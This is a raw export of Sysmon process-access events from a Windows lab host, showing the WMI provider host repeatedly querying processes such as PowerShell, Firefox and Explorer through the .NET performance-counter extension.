21:43:48.552{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149784Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.552{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149783Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.552{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149782Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149781Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149780Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149779Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149778Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149777Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149776Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149775Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149774Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149773Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149772Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149771Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149770Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149769Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149768Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.551{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149767Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.550{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149766Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.550{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149765Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.550{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149764Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.550{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149763Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.550{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149762Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.549{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149761Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 